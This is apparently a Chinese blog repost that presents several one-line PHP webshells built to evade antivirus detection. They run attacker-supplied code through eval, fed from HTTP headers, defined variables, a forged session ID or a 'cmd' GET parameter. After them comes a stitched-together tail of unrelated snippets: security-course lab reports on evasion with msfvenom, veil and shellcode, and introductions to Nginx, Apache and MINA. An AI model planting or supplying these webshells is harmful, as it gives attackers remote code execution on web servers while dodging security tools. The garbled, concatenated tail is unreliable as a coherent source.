PHP利用Apache、Nginx的特性实现免杀Webshell

环境 函数 用法
nginx get_defined_vars() 返回由所有已定义变量所组成的数组
apache getallheaders() 获取全部 HTTP 请求头信息

apache环境

1

2

3

<?php

eval(next(getallheaders()));

?>

apache和nginx环境通用

1

2

3

<?php

eval(implode(reset(get_defined_vars())));

?>

另外一种通过执行伪造的sessionid值,进行任意代码执行。

1

2

3

<?php

eval(hex2bin(session_id(session_start())));

?>

webshell加密码

1

<?php eval(get_defined_vars()[‘_GET‘][‘cmd‘]);?>

原文地址:https://www.cnblogs.com/hookjoy/p/12117466.html

时间: 2024-10-10 11:24:45

PHP利用Apache、Nginx的特性实现免杀Webshell的相关文章

2019-2020-2 20175226王鹏雲《网络对抗技术》Exp3 免杀原理与实践

2019-2020-2 20175226王鹏雲<网络对抗技术>Exp3 免杀原理与实践 实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具.使用C + shellcode编程或使用其他课堂未介绍方法自己利用shellcode编程等免杀工具或技巧 2.通过组合应用各种技术实现恶意代码免杀 (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明

2019-2020-2 20175208 张家华 网络对抗技术 Exp3 免杀原理与实践

实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具.使用C + shellcode编程或使用其他课堂未介绍方法自己利用shellcode编程等免杀工具或技巧 2.通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 实验过程 实验准备即相关知识 VirusTotal.Virscan 集

Nginx优点特性、安装配置、安装目录、配置文件

额外知识点 内网IP: 10.x.x.x 172.16.x.x - 172.31.x.x 192.168.x.x Nginx Web服务应用 Nginx优点: 1.占用资源更少.支持更多并发连接 2.web服务.方向代理.负债均衡.缓存服务 3.安装配置简单.方便.灵活 Nginx特色: A.支持高并发:能支持几万并发连接(特别是静态小文件业务环境) B.资源消耗少:在3万并发连接下,开启10个Nginx线程消耗的内存不到200MB C.可以做到HTTP反向代理及缓存加速,即负载均衡功能,内置对

web服务器 - apache &amp; nginx &amp; tomact

web服务器 - apache & nginx & tomact HTTP Server本质上来说都是这样几件事: 监听端口 接收(accept)socket连接 解析HTTP请求 使用通用或专用协议对请求进行分发 接收分发的请求产生的运行结果 将结果格式化成HTTP Response并写到socket里面 关闭连接或者Keep-Alive 区别一方面在于用了什么语言来实现(Tomcat用Java),一方面是分发时支持的具体协议,Tomcat只支持Servlet接口,Apache和ngin

apache基本配置管理(一):apache基本原理和特性

一.web服务器apache服务的架构和工作原理: web服务器                                                                                在开始了解Apache前,我们先熟悉一下web服务器,因为apache也是web服务器的一种. Web系统由客户端(浏览器)和服务器端两部分组成.Web系统架构也被称为B/S架构.最常见的Web服务器有Apache.IIS等,常用的浏览器有IE.Firefox.chrome等

apache基本配置管理(一):apache基本原理和特性和简单搭建

一.web服务器apache服务的架构和工作原理: web服务器                                                                                在开始了解Apache前,我们先熟悉一下web服务器,因为apache也是web服务器的一种. Web系统由客户端(浏览器)和服务器端两部分组成.Web系统架构也被称为B/S架构.最常见的Web服务器有Apache.IIS等,常用的浏览器有IE.Firefox.chrome等

利用apache服务器搭建个人主页

一.Apache服务器的用途: Apache 是一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一.它快速.可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中. Apacheweb服务器软件拥有以下特性: 支持最新的HTTP/1.1通信协议 拥有简单而强有力的基于文件的配置过程 支持通用网关接口 支持基于IP和基于域名的虚拟主机 支持多种方式的HTTP认证 集成Perl处理模块 集成代理服务器模

利用Apache的commons-beanutils和commons-collections包实现Java对象的按属性排序

在日常工作中经常用到需要对java对象集合或者Map集合中的某个属性做排序,这个需求可以利用Apache的commons-beanutils和commons-collections包来实现,主要实现方式如下: public static <T> void sort(List<T> list, String property, boolean asc) { Comparator<?> comparator = ComparableComparator.getInstanc

Apache MINA - Mina 特性说明

Mina 特性说明 MINA 是一个简单而特性强大的网络应用框架,它提供如下特性 : 提供针对多种传输类型的 API : TCP/IP & UDP/IP (通过 Java NIO) 串口通信 (RS232) (通过 RXTX) JVM 内部管道通信 你可以实现自己的网络协议 ! 使用过滤器接口(Filter)作为扩展点 ; 同 Servlet 过滤器很像 低层和高层 API : 低层 : 使用 ByteBuffers 高层 : 使用用户定义的消息对象和编码 高度自定义的线程模型: 单线程 一个线